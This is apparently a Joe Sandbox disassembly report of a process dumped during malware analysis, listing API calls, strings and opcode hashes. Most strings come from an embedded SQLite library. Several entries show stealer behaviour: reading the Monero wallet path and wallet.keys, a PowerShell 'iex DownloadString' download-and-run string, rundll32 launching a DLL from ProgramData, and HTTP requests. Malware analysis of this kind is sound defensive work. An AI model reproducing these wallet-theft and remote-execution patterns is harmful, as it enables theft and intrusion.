                                                    • Opcode ID: afed1484dbe08c80af930b0dec15a04a84a0063f91bf39101e5236698e50722d
                                                    • Instruction ID: 96366066bc1ce1ce1fd13419add1104be1303b26a02272d6b2b990da334fe007
                                                    • Opcode Fuzzy Hash: afed1484dbe08c80af930b0dec15a04a84a0063f91bf39101e5236698e50722d
                                                    • Instruction Fuzzy Hash: 4F71F871910208EFEB15CFD8D845BEDBBB0FF04304F50846AF515EA290D779AA96DB88
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92baf47d6df9dcf7c928efe7eb65f4a7c1dcf02faf436eed7d02622ad3a97832
                                                    • Instruction ID: 4e04e767b455ac498a5936da9db4e7039c809a933a39873d7fad93e6d7e30833
                                                    • Opcode Fuzzy Hash: 92baf47d6df9dcf7c928efe7eb65f4a7c1dcf02faf436eed7d02622ad3a97832
                                                    • Instruction Fuzzy Hash: F1815875D083828BD7108F20C84076ABBE2BF85382F8C0669E8D51B256EB3DF955C793
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                    • Instruction ID: c19c0a49191998782e5faf71c85eac2119ec9f9a13a0536cbfb34a9db09182b3
                                                    • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                    • Instruction Fuzzy Hash: A751B075A043466BE700DF149D80F6BB7ECEF84714F40063DF94596241EB2EBA5A87E2
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FAA1B26
                                                    • misuse, xrefs: 1FAA1B21
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FAA1B17
                                                    • block, xrefs: 1FAA1A90
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-4016964285
                                                    • Opcode ID: 50b360e84241f54943dcb78a1693c25b6508300f7d25929726ac119e1f4986eb
                                                    • Instruction ID: 55af57beaad15ee975ccbcb0ff4a15fec9314394a9280e9027de383bc6b06e43
                                                    • Opcode Fuzzy Hash: 50b360e84241f54943dcb78a1693c25b6508300f7d25929726ac119e1f4986eb
                                                    • Instruction Fuzzy Hash: 2CC1BEB0A04311AFDB10CF25C884A9A7BA5BF447A4F054669ED499B341E73FF918CF92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                    • API String ID: 0-1539118790
                                                    • Opcode ID: d98ddbba592d3755ba65c81c00241ac1617ba41abd1242daebea27bc4c3912b7
                                                    • Instruction ID: 2e964a05e7069680dbc61caa01e0663c6eba06d0aec0c6621b6eebef280fc229
                                                    • Opcode Fuzzy Hash: d98ddbba592d3755ba65c81c00241ac1617ba41abd1242daebea27bc4c3912b7
                                                    • Instruction Fuzzy Hash: 619125716443029BCB04DE29C884BDAB7E1BF85324F14856DF95D9B3A1E33EE846CB52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                    • API String ID: 0-165706444
                                                    • Opcode ID: 58f0f68dcdf28e9c0bb64e4a6acdaa3c66b3beb4a8b0a34c8e79bba9be4858cd
                                                    • Instruction ID: 956383eabdd51c2f5504abc5640b3561d1eb8cb773383a6887db413ab32c3969
                                                    • Opcode Fuzzy Hash: 58f0f68dcdf28e9c0bb64e4a6acdaa3c66b3beb4a8b0a34c8e79bba9be4858cd
                                                    • Instruction Fuzzy Hash: D6619BB5B043486BDB219E21BC80F977799DF82325F2404A9FD148A262F72EF145C7A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                    • API String ID: 0-1499782803
                                                    • Opcode ID: 420d99e20ea875a068f7bde02117542b1f0096bfae20bd94c01612b55526a0b6
                                                    • Instruction ID: cf54f805ab3e8dcf8755e674c661263350243edc10772b55c16e49a3f56e55a0
                                                    • Opcode Fuzzy Hash: 420d99e20ea875a068f7bde02117542b1f0096bfae20bd94c01612b55526a0b6
                                                    • Instruction Fuzzy Hash: 1C510375A043019BDB10CF18D885B5A77E4AF40364F3944A9ED8ACB241E73FF856E762
                                                    APIs
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00411107
                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000), ref: 00411146
                                                    • memset.MSVCRT ref: 00411194
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 00411339
                                                      • Part of subcall function 0040FE78: strlen.MSVCRT ref: 0040FE96
                                                      • Part of subcall function 0041002F: memcpy.MSVCRT ref: 00410062
                                                    Strings
                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004111B3
                                                    • N0ZWFt, xrefs: 00411298, 004112B1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OpenProcessmemcpymemsetstrlen
                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                    • API String ID: 4248304612-1622206642
                                                    • Opcode ID: b0afaa96b4597e210ba1a4c862ca121c709af7aa7cb7942423099bfa00805918
                                                    • Instruction ID: 6bc81985b16bb39c37c12c39f2d38016e25fa18ecaddaeab3ad7fb03e6b96229
                                                    • Opcode Fuzzy Hash: b0afaa96b4597e210ba1a4c862ca121c709af7aa7cb7942423099bfa00805918
                                                    • Instruction Fuzzy Hash: 4E612171D40219EFEB20DBA4DC86BEDB7B4AB04704F5040AAF618A61D1DBB85AC4CF59
                                                    APIs
                                                    • memset.MSVCRT ref: 004010D0
                                                      • Part of subcall function 00401055: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401069
                                                      • Part of subcall function 00401055: HeapAlloc.KERNEL32(00000000), ref: 00401070
                                                      • Part of subcall function 00401055: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0040108A
                                                      • Part of subcall function 00401055: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004010A5
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004010F7
                                                    • lstrlenA.KERNEL32(?), ref: 00401104
                                                    • lstrcatA.KERNEL32(?,.keys), ref: 0040111F
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                    • memset.MSVCRT ref: 004012F2
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$File$AllocCreateHeapLocalOpenlstrlenmemset$CloseFreeHandleObjectProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                    • API String ID: 2131673957-218353709
                                                    • Opcode ID: 3dccb5c2a575d22e4e50a91fcd560407ce44f22a403e94a74d02d22c1b458bb6
                                                    • Instruction ID: 5187a096fbb9e6a672ec0d50bbfcfb0db4b143f24dc30b3489d32bac6fd7d5a1
                                                    • Opcode Fuzzy Hash: 3dccb5c2a575d22e4e50a91fcd560407ce44f22a403e94a74d02d22c1b458bb6
                                                    • Instruction Fuzzy Hash: 775103B1D402199BCB15FB61DD96EED737DAB10304F4040AAF20AA20E1EE399BC5CE58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                    • API String ID: 0-538076154
                                                    • Opcode ID: 77341ad2045aee932587dbb543ad58d0720e453628ab9d4a232c6cdb6e571f27
                                                    • Instruction ID: 5434c98ea63580729607ff14d9f94ca76f1898cb0f6cfa72a0441fe71a49a9aa
                                                    • Opcode Fuzzy Hash: 77341ad2045aee932587dbb543ad58d0720e453628ab9d4a232c6cdb6e571f27
                                                    • Instruction Fuzzy Hash: CB31BA75924384AFDF101A247C00ACB7BA5EF8532DF088528FDA566221F77DF5158BA3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                    • Instruction ID: 622aa9004e77124a56e7ee166575b4f931366eb91ee499c95afd29c1713ae38c
                                                    • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                    • Instruction Fuzzy Hash: B321A67AA0039276E7029A209E01FBF73DC6F41615F454969FE15A5140FB2DF74A83E3
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB3FBA5
                                                    • misuse, xrefs: 1FB3FBA0
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB3FB96
                                                    • API called with NULL prepared statement, xrefs: 1FB3FB65
                                                    • API called with finalized prepared statement, xrefs: 1FB3FB7A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 0e5bf6e8d0772a812d12ad12d48c6437eaabe20a72ba7e29cbab86579786ccad
                                                    • Instruction ID: 934df6fe4bc08aced8480231f29f9e3daf747571f4d87f139f23e9391a1e8cf1
                                                    • Opcode Fuzzy Hash: 0e5bf6e8d0772a812d12ad12d48c6437eaabe20a72ba7e29cbab86579786ccad
                                                    • Instruction Fuzzy Hash: 47B1B1B4E847019BD7148F35E844B5777E4FF4471AF44092CE8CA8B242E77AF44A8BA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
                                                    • API String ID: 0-3324442540
                                                    • Opcode ID: 09de832e4ad3264db7ecacc77674da99257faa97280f4249f7faeaafccd0d18b
                                                    • Instruction ID: a6446b1dc1017cc5af3c829eb8487e63606ce4812cd0c49700ce500b87c0d047
                                                    • Opcode Fuzzy Hash: 09de832e4ad3264db7ecacc77674da99257faa97280f4249f7faeaafccd0d18b
                                                    • Instruction Fuzzy Hash: 0B81F175A043529BDB008F64DC84A8BB7E8FF44769F040269FD45AB210E73EF920DB92
                                                    Strings
                                                    • invalid, xrefs: 1FB274BC
                                                    • %s at line %d of [%.10s], xrefs: 1FB274DC
                                                    • misuse, xrefs: 1FB274D7
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB274CD
                                                    • unable to close due to unfinalized statements or unfinished backups, xrefs: 1FB275D1
                                                    • API call with %s database connection pointer, xrefs: 1FB274C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                    • API String ID: 0-3800776574
                                                    • Opcode ID: 48c20d8a21d39d47d75bb685fa712da0baadd1a25c340231fc8fd8df89508f90
                                                    • Instruction ID: 721e38393f0cb4dbfabefac9452f9ab09f4268f2f6852cb42491f672be326c33
                                                    • Opcode Fuzzy Hash: 48c20d8a21d39d47d75bb685fa712da0baadd1a25c340231fc8fd8df89508f90
                                                    • Instruction Fuzzy Hash: C4516474A00B12ABD7118B38BC84B9BB7E5EF40724F640018E99E96341F739F551C3AA
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004140E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                    • String ID: CA$')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    • API String ID: 2215929589-1568210641
                                                    • Opcode ID: 8e91d5c534343fc3e33cabc981ee1271554e1bdb2bac536b6b3cf1ed09433482
                                                    • Instruction ID: 2e843fc000d8416bd3dbc05d1e9ae495b45b34b851b8c2d099c776955265e93a
                                                    • Opcode Fuzzy Hash: 8e91d5c534343fc3e33cabc981ee1271554e1bdb2bac536b6b3cf1ed09433482
                                                    • Instruction Fuzzy Hash: 6751EE719102089ADB14FBE1DCA2FDDB778AF10305F50406EE216A61E1DF785AC9CF58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strchr$lstrlen
                                                    • String ID: 0123456789ABCDEF
                                                    • API String ID: 2725200765-2554083253
                                                    • Opcode ID: 8b16c25132bc3e6aa80ea2e1fda564ee457b7c6459d3040e764f623306277993
                                                    • Instruction ID: 46cccf125fc31855eb9dff2261fe02118d1d410b234b58c33e9b0ac1b0e2b6e5
                                                    • Opcode Fuzzy Hash: 8b16c25132bc3e6aa80ea2e1fda564ee457b7c6459d3040e764f623306277993
                                                    • Instruction Fuzzy Hash: A1512470E00209EFDF10DFA9D841BEDBBB5EF09304F1084AAE419AB2A1D7759A85CF54
                                                    Strings
                                                    • undersize RTree blobs in "%q_node", xrefs: 1FACBDA1
                                                    • PRAGMA %Q.page_size, xrefs: 1FACBD03
                                                    • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1FACBD67
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                    • API String ID: 0-3485589083
                                                    • Opcode ID: 769d319fccabb81f90f3cc6c3586ee0f45395d1499b9cac225b3998b6fab1038
                                                    • Instruction ID: 86cdf4539fd432e7edb682d463683f5846b92526e912d84a53f7459cfbe5ab04
                                                    • Opcode Fuzzy Hash: 769d319fccabb81f90f3cc6c3586ee0f45395d1499b9cac225b3998b6fab1038
                                                    • Instruction Fuzzy Hash: AA3122B1A04312ABD7048B25CD80A9773E8EF447A5F040265FE0596301E73FE964EBA1
                                                    APIs
                                                    • CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 0041255C
                                                    • GetDeviceCaps.GDI32(?,00000008), ref: 0041256A
                                                    • GetDeviceCaps.GDI32(?,0000000A), ref: 00412578
                                                    • ReleaseDC.USER32(00000000,?), ref: 00412586
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00412593
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041259A
                                                    • wsprintfA.USER32 ref: 004125B1
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                    • String ID: %dx%d
                                                    • API String ID: 3940144428-2206825331
                                                    • Opcode ID: b22c5c38cc7cdad4ef6c166147913989f5cf1351a917ecd119eae9f0ff66eb37
                                                    • Instruction ID: 5ce7785616710ce4f89e5332b354fec486e5a05674633c85d06844614b7c2b8c
                                                    • Opcode Fuzzy Hash: b22c5c38cc7cdad4ef6c166147913989f5cf1351a917ecd119eae9f0ff66eb37
                                                    • Instruction Fuzzy Hash: F901E878A80209FFEB01AFA0DD0ABAD7FB2FB06705F105455FA12B91E0C7715A50DB55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 96829313a16be0ae2fbc90066ac3be56674192d708d5e683409de3119d1767a8
                                                    • Instruction ID: 23f22f8eacafaefdf5902547380795726215a6313aa774d5e9fc2a0543d8d04d
                                                    • Opcode Fuzzy Hash: 96829313a16be0ae2fbc90066ac3be56674192d708d5e683409de3119d1767a8
                                                    • Instruction Fuzzy Hash: 3FF14371A057529FD700CF29D880AA6BBE0FF44324F884599E95CCB352E33AF956C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (FK)
                                                    • API String ID: 0-1642768157
                                                    • Opcode ID: 717a637b7dedb7f0d4c246a724012f1256e5b4f6b8667b17f8aae830383468db
                                                    • Instruction ID: 37dc457855df589a9292b4dcb397e09cad94289308f01f3c4d504b06ad80ed15
                                                    • Opcode Fuzzy Hash: 717a637b7dedb7f0d4c246a724012f1256e5b4f6b8667b17f8aae830383468db
                                                    • Instruction Fuzzy Hash: 3581B477B053009FD7149F28EC40B56F3A2FB88236F2446AEE54A8B6A1E736F510DB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s-shm$readonly_shm$winOpenShm
                                                    • API String ID: 0-2815843928
                                                    • Opcode ID: 745e5751d117f10abf35b1c5875ba8c1a2ec24d08b4df4816b94733bac02610b
                                                    • Instruction ID: 060876c3e11ef7bcf364033048c988a4065d8d5968fcd1b8e0b6029f7e55e046
                                                    • Opcode Fuzzy Hash: 745e5751d117f10abf35b1c5875ba8c1a2ec24d08b4df4816b94733bac02610b
                                                    • Instruction Fuzzy Hash: 6491BFB09083129FDB10DF25EC84BA777A9EF00B25F040569FE4696381E736F525DBA2
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00413C16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                    • String ID: "" $$BA$.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                    • API String ID: 2215929589-646926709
                                                    • Opcode ID: 45d5be44739e81b9edab66bad14ffca3f4e409a00a5552d9b1fa4abfd336d293
                                                    • Instruction ID: cfeabb11261229d7ed837fa1be0ad6a25a3c7238fc58edf77806757b94d1f4fc
                                                    • Opcode Fuzzy Hash: 45d5be44739e81b9edab66bad14ffca3f4e409a00a5552d9b1fa4abfd336d293
                                                    • Instruction Fuzzy Hash: CE91FD719002089ADB15FBA1DD92FEDB778AF10305F50406FE216A61E1EF386B89CF58
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00404AD5: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404B22
                                                      • Part of subcall function 00404AD5: RtlAllocateHeap.NTDLL(00000000), ref: 00404B29
                                                      • Part of subcall function 00404AD5: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404B54
                                                      • Part of subcall function 00404AD5: StrCmpCA.SHLWAPI(?), ref: 00404B6D
                                                      • Part of subcall function 00404AD5: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BA1
                                                      • Part of subcall function 00404AD5: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 00404C00
                                                      • Part of subcall function 00404AD5: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404C38
                                                      • Part of subcall function 00404AD5: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C49
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
